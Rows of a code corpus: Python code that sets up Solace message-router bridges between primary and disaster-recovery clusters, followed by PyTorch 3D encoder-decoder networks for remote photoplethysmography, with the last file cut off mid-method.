self.vpns.append(vpn % options.environment)
except Exception, e:
self.vpns.append(vpn)
for vpn in self.vpns:
try:
bridgeName = vpn % options.environment
except Exception, e:
bridgeName = vpn
logger.info("Creating Bridge: %s" % bridgeName)
primaryBridgeName = "%s_%s" % ("primary", bridgeName)
backupBridgeName = "%s_%s" % ("backup", bridgeName)
logger.info("Primary Bridge Name: %s" % primaryBridgeName)
logger.info("Backup Bridge Name: %s" % backupBridgeName)
# create bridge on primary cluster
self._create_bridge(self.primaryCluster, primaryBridgeName, vpn,
version=version)
# create bridge on the DR cluster
self._create_bridge(self.drCluster, backupBridgeName, vpn,
version=version)
# create remote on primary cluster bridge
self._create_bridge_remote_addr(self.primaryCluster, primaryBridgeName, vpn,
options.backup_addr, options.primary_phys_intf, version=version)
# create reverse remote on dr cluster bridge
self._create_bridge_remote_vrouter(self.drCluster, backupBridgeName, vpn,
options.primary_cluster_primary_node_name, version=version)
# create remote username on primary cluster bridge
self._bridge_username_addr(self.primaryCluster, primaryBridgeName, vpn,
options.backup_addr, options.primary_phys_intf, options.username,
options.password, version=version)
# create remote username on backup cluster bridge
self._bridge_username_vrouter(self.drCluster, backupBridgeName, vpn,
options.primary_cluster_primary_node_name, options.username,
options.password, version=version)
# enable all bridges
self._bridge_enable(self.primaryCluster, primaryBridgeName, vpn, version=version)
self._bridge_enable(self.drCluster, backupBridgeName, vpn, version=version)
# enable all remotes
self._bridge_enable_remote_addr(self.primaryCluster, primaryBridgeName, vpn,
options.backup_addr, options.primary_phys_intf, version=version)
self._bridge_enable_remote_vrouter(self.drCluster, backupBridgeName, vpn,
options.primary_cluster_primary_node_name, version=version)
# create bridge internal queues
self._bridge_create_queue(self.primaryCluster, options.queue, vpn, options.username, version=version)
self._bridge_create_queue(self.drCluster, options.queue, vpn, options.username, version=version)
# set remote internal queues
self._bridge_set_remote_queue_addr(self.primaryCluster, primaryBridgeName, vpn,
options.backup_addr, options.primary_phys_intf, options.queue,
version=version)
self._bridge_set_remote_queue_vrouter(self.drCluster, backupBridgeName, vpn,
options.primary_cluster_primary_node_name, options.queue,
version=version)
def _create_bridge(self, api, bridgeName, vpn, **kwargs):
api.x = SolaceXMLBuilder("%s create primary bridge: %s on primary appliance" % (api.primaryRouter, bridgeName),
version=api.version)
api.x.create.bridge.bridge_name = bridgeName
api.x.create.bridge.vpn_name = vpn
api.x.create.bridge.primary
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder("%s create backup bridge: %s on backup appliance" % (api.backupRouter, bridgeName),
version=api.version)
api.x.create.bridge.bridge_name = bridgeName
api.x.create.bridge.vpn_name = vpn
api.x.create.bridge.backup
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _create_bridge_remote_vrouter(self, api, bridgeName, vpn, virtual_router, **kwargs):
api.x = SolaceXMLBuilder("%s configure primary bridge: %s vrouter: %s on primary appliance" % (
api.primaryRouter, bridgeName, virtual_router), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.create.message_vpn.vpn_name = vpn
api.x.bridge.remote.create.message_vpn.router
api.x.bridge.remote.create.message_vpn.virtual_router_name = "v:%s" % virtual_router
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder("%s configure backup bridge: %s vrouter: %s on backup appliance" % (
api.backupRouter, bridgeName, virtual_router), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.create.message_vpn.vpn_name = vpn
api.x.bridge.remote.create.message_vpn.router
api.x.bridge.remote.create.message_vpn.virtual_router_name = "v:%s" % virtual_router
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _create_bridge_remote_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, **kwargs):
api.x = SolaceXMLBuilder(
"%s configure primary bridge: %s remote addr: %s phys_intf: %s on primary appliance" % (
api.primaryRouter, bridgeName, backup_addr, phys_intf), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.create.message_vpn.vpn_name = vpn
api.x.bridge.remote.create.message_vpn.connect_via
api.x.bridge.remote.create.message_vpn.addr = backup_addr
api.x.bridge.remote.create.message_vpn.interface
api.x.bridge.remote.create.message_vpn.phys_intf = phys_intf
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder("%s configure backup bridge: %s remote addr: %s phys_intf: %s on backup appliance" % (
api.backupRouter, bridgeName, backup_addr, phys_intf), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.create.message_vpn.vpn_name = vpn
api.x.bridge.remote.create.message_vpn.connect_via
api.x.bridge.remote.create.message_vpn.addr = backup_addr
api.x.bridge.remote.create.message_vpn.interface
api.x.bridge.remote.create.message_vpn.phys_intf = phys_intf
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_username_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, username, password, **kwargs):
api.x = SolaceXMLBuilder("%s primary bridge: %s remote username: %s on primary appliance" % (
api.primaryRouter, bridgeName, username), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.connect_via
api.x.bridge.remote.message_vpn.addr = backup_addr
api.x.bridge.remote.message_vpn.interface
api.x.bridge.remote.message_vpn.phys_intf = phys_intf
api.x.bridge.remote.message_vpn.client_username.name = username
api.x.bridge.remote.message_vpn.client_username.password = password
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder(
"%s backup bridge: %s remote username: %s on backup appliance" % (api.backupRouter, bridgeName, username),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.connect_via
api.x.bridge.remote.message_vpn.addr = backup_addr
api.x.bridge.remote.message_vpn.interface
api.x.bridge.remote.message_vpn.phys_intf = phys_intf
api.x.bridge.remote.message_vpn.client_username.name = username
api.x.bridge.remote.message_vpn.client_username.password = password
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_username_vrouter(self, api, bridgeName, vpn, vrouter, username, password, **kwargs):
api.x = SolaceXMLBuilder("%s primary bridge: %s remote username: %s on primary appliance" % (
api.primaryRouter, bridgeName, username), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.router
api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
api.x.bridge.remote.message_vpn.client_username.name = username
api.x.bridge.remote.message_vpn.client_username.password = password
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder(
"%s backup bridge: %s remote username: %s on backup appliance" % (api.backupRouter, bridgeName, username),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.router
api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
api.x.bridge.remote.message_vpn.client_username.name = username
api.x.bridge.remote.message_vpn.client_username.password = password
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_enable(self, api, bridgeName, vpn, **kwargs):
api.x = SolaceXMLBuilder(
"%s enable bridge: %s for vpn: %s on primary appliance" % (api.primaryRouter, bridgeName, vpn),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.no.shutdown
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder(
"%s enable bridge: %s for vpn: %s on backup appliance" % (api.backupRouter, bridgeName, vpn),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.no.shutdown
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_enable_remote_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, **kwargs):
api.x = SolaceXMLBuilder("%s enable primary bridge: %s remote addr: %s phys_intf: %s on primary appliance" % (
api.primaryRouter, bridgeName, backup_addr, phys_intf), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.connect_via
api.x.bridge.remote.message_vpn.addr = backup_addr
api.x.bridge.remote.message_vpn.interface
api.x.bridge.remote.message_vpn.phys_intf = phys_intf
api.x.bridge.remote.message_vpn.no.shutdown
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder("%s enable backup bridge: %s remote addr: %s phys_intf: %s on backup appliance" % (
api.backupRouter, bridgeName, backup_addr, phys_intf), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.connect_via
api.x.bridge.remote.message_vpn.addr = backup_addr
api.x.bridge.remote.message_vpn.interface
api.x.bridge.remote.message_vpn.phys_intf = phys_intf
api.x.bridge.remote.message_vpn.no.shutdown
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_enable_remote_vrouter(self, api, bridgeName, vpn, vrouter, **kwargs):
api.x = SolaceXMLBuilder("%s enable primary bridge: %s vrouter: %s" % (api.primaryRouter, bridgeName, vrouter),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.router
api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
api.x.bridge.remote.message_vpn.no.shutdown
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder("%s enable backup bridge: %s vrouter: %s" % (api.backupRouter, bridgeName, vrouter),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.router
api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
api.x.bridge.remote.message_vpn.no.shutdown
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_disable_remote_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, **kwargs):
api.x = SolaceXMLBuilder("%s disable primary bridge: %s remote addr: %s phys_intf: %s on primary appliance" % (
api.primaryRouter, bridgeName, backup_addr, phys_intf), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.connect_via
api.x.bridge.remote.message_vpn.addr = backup_addr
api.x.bridge.remote.message_vpn.interface
api.x.bridge.remote.message_vpn.phys_intf = phys_intf
api.x.bridge.remote.message_vpn.shutdown
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder("%s disable backup bridge: %s remote addr: %s phys_intf: %s on backup appliance" % (
api.backupRouter, bridgeName, backup_addr, phys_intf), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.connect_via
api.x.bridge.remote.message_vpn.addr = backup_addr
api.x.bridge.remote.message_vpn.interface
api.x.bridge.remote.message_vpn.phys_intf = phys_intf
api.x.bridge.remote.message_vpn.shutdown
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_disable_remote_vrouter(self, api, bridgeName, vpn, vrouter, **kwargs):
api.x = SolaceXMLBuilder("%s enable primary bridge: %s vrouter: %s" % (api.primaryRouter, bridgeName, vrouter),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.router
api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
api.x.bridge.remote.message_vpn.shutdown
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder("%s enable backup bridge: %s vrouter: %s" % (api.backupRouter, bridgeName, vrouter),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.router
api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
api.x.bridge.remote.message_vpn.shutdown
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_create_queue(self, api, queueName, vpnName, username, **kwargs):
logger.info("%s:%s creating bridge queue: %s with owner username: %s" % (
api.primaryRouter, api.backupRouter, queueName, username))
queue1 = {}
queue1['queue_config'] = {}
queue1['queue_config']["exclusive"] = "true"
queue1['queue_config']["queue_size"] = "4096"
queue1['queue_config']["retries"] = 0
queue1["name"] = queueName
vpnd = {}
vpnd['vpn_name'] = vpnName
vpnd['owner_username'] = username
q1 = SolaceQueue(api, vpnd, [queue1])
for c in q1.queue.commands:
api.cq.enqueue(str(api.x))
def _bridge_set_remote_queue_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, queueName, **kwargs):
api.x = SolaceXMLBuilder("%s primary bridge: %s set remote queue: %s on primary appliance" % (
api.primaryRouter, bridgeName, queueName), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.connect_via
api.x.bridge.remote.message_vpn.addr = backup_addr
api.x.bridge.remote.message_vpn.interface
api.x.bridge.remote.message_vpn.phys_intf = phys_intf
api.x.bridge.remote.message_vpn.message_spool.queue.name = queueName
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder(
"%s backup bridge: %s set remote queue: %s on backup appliance" % (api.backupRouter, bridgeName, queueName),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.connect_via
api.x.bridge.remote.message_vpn.addr = backup_addr
api.x.bridge.remote.message_vpn.interface
api.x.bridge.remote.message_vpn.phys_intf = phys_intf
api.x.bridge.remote.message_vpn.message_spool.queue.name = queueName
api.cq.enqueueV2(str(api.x), backupOnly=True)
def _bridge_set_remote_queue_vrouter(self, api, bridgeName, vpn, vrouter, queueName, **kwargs):
api.x = SolaceXMLBuilder("%s primary bridge: %s set remote queue: %s on primary appliance" % (
api.primaryRouter, bridgeName, queueName), version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.primary
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.router
api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
api.x.bridge.remote.message_vpn.message_spool.queue.name = queueName
api.cq.enqueueV2(str(api.x), primaryOnly=True)
api.x = SolaceXMLBuilder(
"%s backup bridge: %s set remote queue: %s on backup appliance" % (api.backupRouter, bridgeName, queueName),
version=api.version)
api.x.bridge.bridge_name = bridgeName
api.x.bridge.vpn_name = vpn
api.x.bridge.backup
api.x.bridge.remote.message_vpn.vpn_name = vpn
api.x.bridge.remote.message_vpn.router
api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
api.x.bridge.remote.message_vpn.message_spool.queue.name = queueName
api.cq.enqueueV2(str(api.x), backupOnly=True)
| 51.644769
| 120
| 0.65971
| 2,698
| 21,226
| 5.035953
| 0.050408
| 0.065651
| 0.123648
| 0.11776
| 0.870391
| 0.845588
| 0.800765
| 0.779716
| 0.779716
| 0.763377
| 0
| 0.002346
| 0.236785
| 21,226
| 410
| 121
| 51.770732
| 0.836358
| 0.015971
| 0
| 0.738235
| 0
| 0
| 0.085365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.023529
| 0.020588
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
73fe90f1f9c2a44e5c7cc0c34a56279ddb7d3664
| 181
|
py
|
Python
|
src/experiment.py
|
Abastro/pointgroup-hs
|
7910ae41ba3dbcf8a5674feb8773732aa5662a48
|
[
"BSD-3-Clause"
] | null | null | null |
src/experiment.py
|
Abastro/pointgroup-hs
|
7910ae41ba3dbcf8a5674feb8773732aa5662a48
|
[
"BSD-3-Clause"
] | null | null | null |
src/experiment.py
|
Abastro/pointgroup-hs
|
7910ae41ba3dbcf8a5674feb8773732aa5662a48
|
[
"BSD-3-Clause"
] | null | null | null |
import torch
import spconv
#from lib.pointgroup_ops.functions import pointgroup_ops
torch.jit.script(spconv.SparseConv3d(32, 64, 3))
#torch.jit.script(pointgroup_ops.BFSCluster())
| 25.857143
| 56
| 0.81768
| 26
| 181
| 5.576923
| 0.576923
| 0.268966
| 0.193103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.071823
| 181
| 6
| 57
| 30.166667
| 0.827381
| 0.552486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73fefe62f538f3f0ab1a894fa20de3547d579115
| 21,477
|
py
|
Python
|
networks.py
|
deividbotina-alv/rtrppg
|
9cccda0c66e334aa30cb77b2f8b0b465d45665c0
|
[
"MIT"
] | null | null | null |
networks.py
|
deividbotina-alv/rtrppg
|
9cccda0c66e334aa30cb77b2f8b0b465d45665c0
|
[
"MIT"
] | null | null | null |
networks.py
|
deividbotina-alv/rtrppg
|
9cccda0c66e334aa30cb77b2f8b0b465d45665c0
|
[
"MIT"
] | 1
|
2022-03-15T10:51:58.000Z
|
2022-03-15T10:51:58.000Z
|
import torch.nn as nn
import torch
#%% 3DED128 (baseline)
class N3DED128(nn.Module):
def __init__(self, frames=128):
super(N3DED128, self).__init__()
self.Conv1 = nn.Sequential(
nn.Conv3d(3, 16, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(16),
nn.ReLU(inplace=True),
)
self.Conv2 = nn.Sequential(
nn.Conv3d(16, 32, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(32),
nn.ReLU(inplace=True),
)
self.Conv3 = nn.Sequential(
nn.Conv3d(32, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.Conv4 = nn.Sequential(
nn.Conv3d(64, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.TrConv1 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.TrConv2 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.ConvBlock5 = nn.Conv3d(64, 1, [1,1,1],stride=1, padding=0)
self.MaxpoolSpaTem_244_244 = nn.MaxPool3d((2, 4, 4), stride=(2,4,4))
self.poolspa = nn.AdaptiveAvgPool3d((frames,1,1))
def forward(self, x): # [batch, Features=3, Temp=128, Width=128, Height=128]
# ENCODER
x = self.Conv1(x) # [b, F=3, T=128, W=128, H=128]->[b, F=16, T=128, W=128, H=128]
x = self.MaxpoolSpaTem_244_244(x) # [b, F=16, T=128, W=128, H=128]->[b, F=16, T=64, W=32, H=32]
x = self.Conv2(x) # [b, F=16, T=64, W=32, H=32]->[b, F=32, T=64, W=32, H=32]
x = self.MaxpoolSpaTem_244_244(x) # [b, F=32, T=64, W=32, H=32]->[b, F=32, T=32, W=8, H=8]
x = self.Conv3(x) # [b, F=32, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
x = self.Conv4(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
# DECODER
x = self.TrConv1(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=64, W=8, H=8]
x = self.TrConv2(x) # [b, F=64, T=64, W=8, H=8]->[b, F=64, T=128, W=8, H=8]
x = self.poolspa(x) # [b, F=64, T=128, W=8, H=8]->[b, F=64, T=128, W=1, H=1]
x = self.ConvBlock5(x) # [b, F=64, T=128, W=1, H=1]->[b, F=1, T=128, W=1, H=1]
rPPG = x.view(-1,x.shape[2]) # [b,128]
return rPPG
#%% 3DED64
class N3DED64(nn.Module):
def __init__(self, frames=128):
super(N3DED64, self).__init__()
self.Conv1 = nn.Sequential(
nn.Conv3d(3, 16, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(16),
nn.ReLU(inplace=True),
)
self.Conv2 = nn.Sequential(
nn.Conv3d(16, 32, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(32),
nn.ReLU(inplace=True),
)
self.Conv3 = nn.Sequential(
nn.Conv3d(32, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.Conv4 = nn.Sequential(
nn.Conv3d(64, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.TrConv1 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.TrConv2 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.ConvBlock5 = nn.Conv3d(64, 1, [1,1,1],stride=1, padding=0)
self.MaxpoolSpaTem_244_244 = nn.MaxPool3d((2, 4, 4), stride=(2,4,4))
self.MaxpoolSpaTem_222_222 = nn.MaxPool3d((2, 2, 2), stride=2)
self.poolspa = nn.AdaptiveAvgPool3d((frames,1,1))
def forward(self, x): # [batch, Features=3, Temp=128, Width=64, Height=64]
# ENCODER
x = self.Conv1(x) # [b, F=3, T=128, W=64, H=64]->[b, F=16, T=128, W=64, H=64]
x = self.MaxpoolSpaTem_222_222(x) # [b, F=16, T=128, W=64, H=64]->[b, F=16, T=64, W=32, H=32]
x = self.Conv2(x) # [b, F=16, T=64, W=32, H=32]->[b, F=32, T=64, W=32, H=32]
x = self.MaxpoolSpaTem_244_244(x) # [b, F=32, T=64, W=32, H=32]->[b, F=32, T=32, W=8, H=8]
x = self.Conv3(x) # [b, F=32, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
x = self.Conv4(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
# DECODER
x = self.TrConv1(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=64, W=8, H=8]
x = self.TrConv2(x) # [b, F=64, T=64, W=8, H=8]->[b, F=64, T=128, W=8, H=8]
x = self.poolspa(x) # [b, F=64, T=128, W=8, H=8]->[b, F=64, T=128, W=1, H=1]
x = self.ConvBlock5(x) # [b, F=64, T=128, W=1, H=1]->[b, F=1, T=128, W=1, H=1]
rPPG = x.view(-1,x.shape[2]) # [b,128]
return rPPG
#%% 3DED32
class N3DED32(nn.Module):
def __init__(self, frames=128):
super(N3DED32, self).__init__()
self.Conv1 = nn.Sequential(
nn.Conv3d(3, 16, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(16),
nn.ReLU(inplace=True),
)
self.Conv2 = nn.Sequential(
nn.Conv3d(16, 32, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(32),
nn.ReLU(inplace=True),
)
self.Conv3 = nn.Sequential(
nn.Conv3d(32, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.Conv4 = nn.Sequential(
nn.Conv3d(64, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.TrConv1 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.TrConv2 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.ConvBlock5 = nn.Conv3d(64, 1, [1,1,1],stride=1, padding=0)
self.MaxpoolSpaTem_244_244 = nn.MaxPool3d((2, 4, 4), stride=(2,4,4))
self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
self.poolspa = nn.AdaptiveAvgPool3d((frames,1,1))
def forward(self, x): # [batch, Features=3, Temp=128, Width=32, Height=32]
# ENCODER
x = self.Conv1(x) # [b, F=3, T=128, W=32, H=32]->[b, F=16, T=128, W=32, H=32]
x = self.MaxpoolTem_211_211(x) # [b, F=16, T=128, W=32, H=32]->[b, F=16, T=64, W=32, H=32]
x = self.Conv2(x) # [b, F=16, T=64, W=32, H=32]->[b, F=32, T=64, W=32, H=32]
x = self.MaxpoolSpaTem_244_244(x) # [b, F=32, T=64, W=32, H=32]->[b, F=32, T=32, W=8, H=8]
x = self.Conv3(x) # [b, F=32, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
x = self.Conv4(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
# DECODER
x = self.TrConv1(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=64, W=8, H=8]
x = self.TrConv2(x) # [b, F=64, T=64, W=8, H=8]->[b, F=64, T=128, W=8, H=8]
x = self.poolspa(x) # [b, F=64, T=128, W=8, H=8]->[b, F=64, T=128, W=1, H=1]
x = self.ConvBlock5(x) # [b, F=64, T=128, W=1, H=1]->[b, F=1, T=128, W=1, H=1]
rPPG = x.view(-1,x.shape[2]) # [b,128]
return rPPG
#%% 3DED16
class N3DED16(nn.Module):
def __init__(self, frames=128):
super(N3DED16, self).__init__()
self.Conv1 = nn.Sequential(
nn.Conv3d(3, 16, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(16),
nn.ReLU(inplace=True),
)
self.Conv2 = nn.Sequential(
nn.Conv3d(16, 32, [1,5,5],stride=1, padding=[0,2,2]),
nn.BatchNorm3d(32),
nn.ReLU(inplace=True),
)
self.Conv3 = nn.Sequential(
nn.Conv3d(32, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.Conv4 = nn.Sequential(
nn.Conv3d(64, 64, [3, 3, 3], stride=1, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
self.TrConv1 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.TrConv2 = nn.Sequential(
nn.ConvTranspose3d(in_channels=64, out_channels=64, kernel_size=[4,1,1], stride=[2,1,1], padding=[1,0,0]), #[1, 128, 32]
nn.BatchNorm3d(64),
nn.ELU(),
)
self.ConvBlock5 = nn.Conv3d(64, 1, [1,1,1],stride=1, padding=0)
self.MaxpoolSpaTem_222_222 = nn.MaxPool3d((2, 2, 2), stride=2)
self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
self.poolspa = nn.AdaptiveAvgPool3d((frames,1,1))
def forward(self, x): # [batch, Features=3, Temp=128, Width=16, Height=16]
# ENCODER
x = self.Conv1(x) # [b, F=3, T=128, W=16, H=16]->[b, F=16, T=128, W=16, H=16]
x = self.MaxpoolTem_211_211(x) # [b, F=16, T=128, W=16, H=16]->[b, F=16, T=64, W=16, H=16]
x = self.Conv2(x) # [b, F=16, T=64, W=16, H=16]->[b, F=32, T=64, W=16, H=16]
x = self.MaxpoolSpaTem_222_222(x) # [b, F=32, T=64, W=16, H=16]->[b, F=32, T=32, W=8, H=8]
x = self.Conv3(x) # [b, F=32, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
x = self.Conv4(x) # [b, F=64, T=32, W=8, H=8]->[b, F=64, T=32, W=8, H=8]
# DECODER
